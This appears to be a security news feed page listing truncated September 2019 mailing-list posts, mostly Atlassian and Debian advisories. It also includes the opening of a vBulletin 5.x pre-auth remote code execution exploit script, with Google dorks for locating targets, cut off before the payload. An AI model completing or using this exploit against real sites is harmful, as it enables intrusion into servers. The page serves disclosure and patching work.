Security News

"For the Glory of the State Machine"

Daily Dave - 25 September, 2019 - 08:43

Posted by Dave Aitel on Sep 25

So for the past while I've been obsessed with HTTP Desync Attacks
<https://www.youtube.com/watch?v=-y82LadA7N4>. A lot of people call this
"http request smuggling" which is a dumb name in a few ways, most
specifically because it restricts the bug class (and hence your mindset)
down to the smallest possible point. To be fair, in my head I call them
Parser State Mismatch bugs.

The way I look at this bugclass is that no two...

Bitbucket Server security advisory 2019-09-18

Bug Traq - 25 September, 2019 - 06:02

Posted by Atlassian on Sep 25

This email refers to the advisory found at
https://confluence.atlassian.com/x/Czc4Og .

CVE ID:

* CVE-2019-15000.

Product: Bitbucket Server and Bitbucket Data Center.

Affected Bitbucket Server and Bitbucket Data Center product versions:

version < 5.16.10
6.0.0 <= version < 6.0.10
6.1.0 <= version < 6.1.8
6.2.0 <= version < 6.2.6
6.3.0 <= version < 6.3.5
6.4.0 <= version < 6.4.3
6.5.0 <= version < 6.5.2...

Jira Security Advisory - 2019-09-18 - CVE-2019-15001

Bug Traq - 25 September, 2019 - 05:58

Posted by Atlassian on Sep 25

This email refers to the advisory found at
https://confluence.atlassian.com/x/KkU4Og .

CVE ID:

* CVE-2019-15001.

Product: Jira Server and Data Center.

Affected Jira Server and Data Center product versions:

7.0.10 <= version < 7.6.16
7.7.0 <= version < 7.13.8
8.0.0 <= version < 8.1.3
8.2.0 <= version < 8.2.5
8.3.0 <= version < 8.3.4
8.4.0 <= version < 8.4.1

Fixed Jira Server and Data Center product...

[SECURITY] [DSA 4531-1] linux security update

Bug Traq - 25 September, 2019 - 04:57

Posted by Salvatore Bonaccorso on Sep 25

-------------------------------------------------------------------------
Debian Security Advisory DSA-4531-1 security () debian org
https://www.debian.org/security/ Salvatore Bonaccorso
September 25, 2019 https://www.debian.org/security/faq
-------------------------------------------------------------------------

Package : linux
CVE ID : CVE-2019-14821 CVE-2019-14835...

[SECURITY] [DSA 4532-1] spip security update

Bug Traq - 25 September, 2019 - 04:53

Posted by Sebastien Delafond on Sep 25

-------------------------------------------------------------------------
Debian Security Advisory DSA-4532-1 security () debian org
https://www.debian.org/security/ Sebastien Delafond
September 25, 2019 https://www.debian.org/security/faq
-------------------------------------------------------------------------

Package : spip
CVE ID : CVE-2019-16391 CVE-2019-16392...

vBulletin 5.x 0day pre-auth RCE exploit

Full Disclosure - 24 September, 2019 - 11:43

Posted by i0su9z+32fpome4pivgiwtzjw--- via Fulldisclosure on Sep 24

#!/usr/bin/python
#
# vBulletin 5.x 0day pre-auth RCE exploit
#
# This should work on all versions from 5.0.0 till 5.5.4
#
# Google Dorks:
# - site:*.vbulletin.net
# - "Powered by vBulletin Version 5.5.4"

import requests
import sys

if len(sys.argv) != 2:
sys.exit("Usage: %s <URL to vBulletin>" % sys.argv[0])

params = {"routestring":"ajax/render/widget_php"}

while True:
try:
cmd...

XSSer v.1.8[1] - "The Hive!" released

Full Disclosure - 24 September, 2019 - 11:41

Posted by psy on Sep 24

Hi FD,

I am glad to present a new release of this tool:

- https://xsser.03c8.net

---------

"Cross Site "Scripter" (aka XSSer) is an automatic -framework- to
detect, exploit and report XSS vulnerabilities in web-based
applications. It provides several options to try to bypass certain
filters and various special techniques for code injection."

---------

XSSer has pre-installed [ > 1300 XSS ] attacking vectors and can...

Re: CVSS is the worst compression algorithm ever

Daily Dave - 24 September, 2019 - 10:30

Posted by Christian Heinrich on Sep 24

Konrad,

Sasha Romanosky and CMU are also listed within the latest minor
release (CVSS v3.1) at
https://www.first.org/cvss/v3.1/specification-document#Appendix-B---Acknowledgments
dated 11 July 2019 as announced at
https://twitter.com/FIRSTdotOrg/status/1149501455553851393 too.

Bug Bounty Competition 2019

Full Disclosure - 23 September, 2019 - 07:50

Posted by Vulnerability Lab on Sep 23

Hello whitehats and bugbounty hunters,
today we would like to invite especially you for the Hack in the Box
Driven2PWN Bug Bounty Competition in Abu Dhabi (UAE) during the 12-17th
October 2019. Please feel free to register through the official service
page and get a fly to the bug bounty competition
(https://d2p.cyberweek.ae/).

Register as individual researcher or ethical whitehat hacker team.

Competition: https://d2p.cyberweek.ae/
Target...

Jira Service Desk Server and Jira Service Desk Data Center - URL path traversal allows information disclosure - CVE-2019-14994

Bug Traq - 23 September, 2019 - 02:58

Posted by Brian Adeloye on Sep 23

This email refers to the advisory found at
https://confluence.atlassian.com/jira/jira-service-desk-security-advisory-2019-09-18-976171274.html

CVE ID:

* CVE-2019-14994.

Product: Jira Service Desk Server and Data Center.

Affected Jira Service Desk Server and Data Center product versions:

version < 3.9.16
3.10.0 <= version < 3.16.8
4.0.0 <= version < 4.1.3
4.2.0 <= version < 4.2.5
4.3.0 <= version < 4.3.4
4.4.0 <=...

[SECURITY] [DSA 4529-1] php7.0 security update

Bug Traq - 23 September, 2019 - 02:54

Posted by Moritz Muehlenhoff on Sep 23

-------------------------------------------------------------------------
Debian Security Advisory DSA-4529-1 security () debian org
https://www.debian.org/security/ Moritz Muehlenhoff
September 20, 2019 https://www.debian.org/security/faq
-------------------------------------------------------------------------

Package : php7.0
CVE ID : CVE-2019-11034 CVE-2019-11035...

[SECURITY] [DSA 4530-1] expat security update

Bug Traq - 23 September, 2019 - 02:50

Posted by Salvatore Bonaccorso on Sep 23

-------------------------------------------------------------------------
Debian Security Advisory DSA-4530-1 security () debian org
https://www.debian.org/security/ Salvatore Bonaccorso
September 22, 2019 https://www.debian.org/security/faq
-------------------------------------------------------------------------

Package : expat
CVE ID : CVE-2019-15903
Debian Bug :...

Reflected XSS – HRworks Login (v1.16.1)

Full Disclosure - 20 September, 2019 - 13:08

Posted by Georg Ph E Heise via Fulldisclosure on Sep 20

# Exploit Title: Reflected XSS – HRworks Login (v1.16.1)

# Vendor Homepage: https://www.hrworks.de

# Exploit Author: Georg Philipp Erasmus Heise / Lufthansa Industry Solutions

# Contact: https://twitter.com/gpheheise

# Website: https://www.lufthansa-industry-solutions.com

# Category: webapps

# CVE: CVE-2019-11559

Timeline

26.04.2019 Disclosure to Vendor

29.04.2019 Vendor informed that the issue was remediated

17.09.2019 Publication...

[SECURITY] [DSA 4526-1] opendmarc security update

Bug Traq - 20 September, 2019 - 03:16

Posted by Salvatore Bonaccorso on Sep 20

-------------------------------------------------------------------------
Debian Security Advisory DSA-4526-1 security () debian org
https://www.debian.org/security/ Salvatore Bonaccorso
September 19, 2019 https://www.debian.org/security/faq
-------------------------------------------------------------------------

Package : opendmarc
CVE ID : CVE-2019-16378
Debian Bug :...

[SECURITY] [DSA 4527-1] php7.3 security update

Bug Traq - 20 September, 2019 - 03:13

Posted by Moritz Muehlenhoff on Sep 20

-------------------------------------------------------------------------
Debian Security Advisory DSA-4527-1 security () debian org
https://www.debian.org/security/ Moritz Muehlenhoff
September 19, 2019 https://www.debian.org/security/faq
-------------------------------------------------------------------------

Package : php7.3
CVE ID : CVE-2019-11036 CVE-2019-11039...

[SECURITY] [DSA 4528-1] bird security update

Bug Traq - 20 September, 2019 - 03:09

Posted by Moritz Muehlenhoff on Sep 20

-------------------------------------------------------------------------
Debian Security Advisory DSA-4528-1 security () debian org
https://www.debian.org/security/ Moritz Muehlenhoff
September 19, 2019 https://www.debian.org/security/faq
-------------------------------------------------------------------------

Package : bird
CVE ID : CVE-2019-16159

Daniel McCarney...

[SECURITY] [DSA 4525-1] ibus security update

Bug Traq - 19 September, 2019 - 01:49

Posted by Salvatore Bonaccorso on Sep 18

-------------------------------------------------------------------------
Debian Security Advisory DSA-4525-1 security () debian org
https://www.debian.org/security/ Salvatore Bonaccorso
September 18, 2019 https://www.debian.org/security/faq
-------------------------------------------------------------------------

Package : ibus
CVE ID : CVE-2019-14822
Debian Bug :...

SEC Consult SA-20190918-0 :: Reflected Cross-Site Scripting (XSS) in Oracle Mojarra JSF

Bug Traq - 18 September, 2019 - 09:03

Posted by SEC Consult Vulnerability Lab on Sep 18

SEC Consult Vulnerability Lab Security Advisory < 20190918-0 >
=======================================================================
title: Reflected Cross-Site Scripting (XSS)
product: Oracle Mojarra JSF included in Java EE 7
Eclipse Mojarra JSF
vulnerable version: 2.2 & 2.3
fixed version: https://github.com/javaserverfaces/mojarra/commits/MOJARRA_2_2X_ROLLING...

SEC Consult SA-20190918-0 :: Reflected Cross-Site Scripting (XSS) in Oracle Mojarra JSF

Full Disclosure - 18 September, 2019 - 06:06

Posted by SEC Consult Vulnerability Lab on Sep 18

SEC Consult Vulnerability Lab Security Advisory < 20190918-0 >
=======================================================================
title: Reflected Cross-Site Scripting (XSS)
product: Oracle Mojarra JSF included in Java EE 7
Eclipse Mojarra JSF
vulnerable version: 2.2 & 2.3
fixed version: https://github.com/javaserverfaces/mojarra/commits/MOJARRA_2_2X_ROLLING...

Re: Longer form questions

Daily Dave - 17 September, 2019 - 16:03

Posted by Andre Gironda on Sep 17

Daemonlogger + Zeek Intelligence Framework for sightings. Doesn't need TLS
secrets. Doesn't need high availability or to run inline. The sensors tell
you what they see and where and when they saw it. No need to block. No need
to "detect". No signatures at all (just a living watchlist). No AI/ML. No
modification of traffic. No huge concern if an APT, skiddie, or admin
crashes it (it's receive-only on the Daemonlogger...
Syndicate content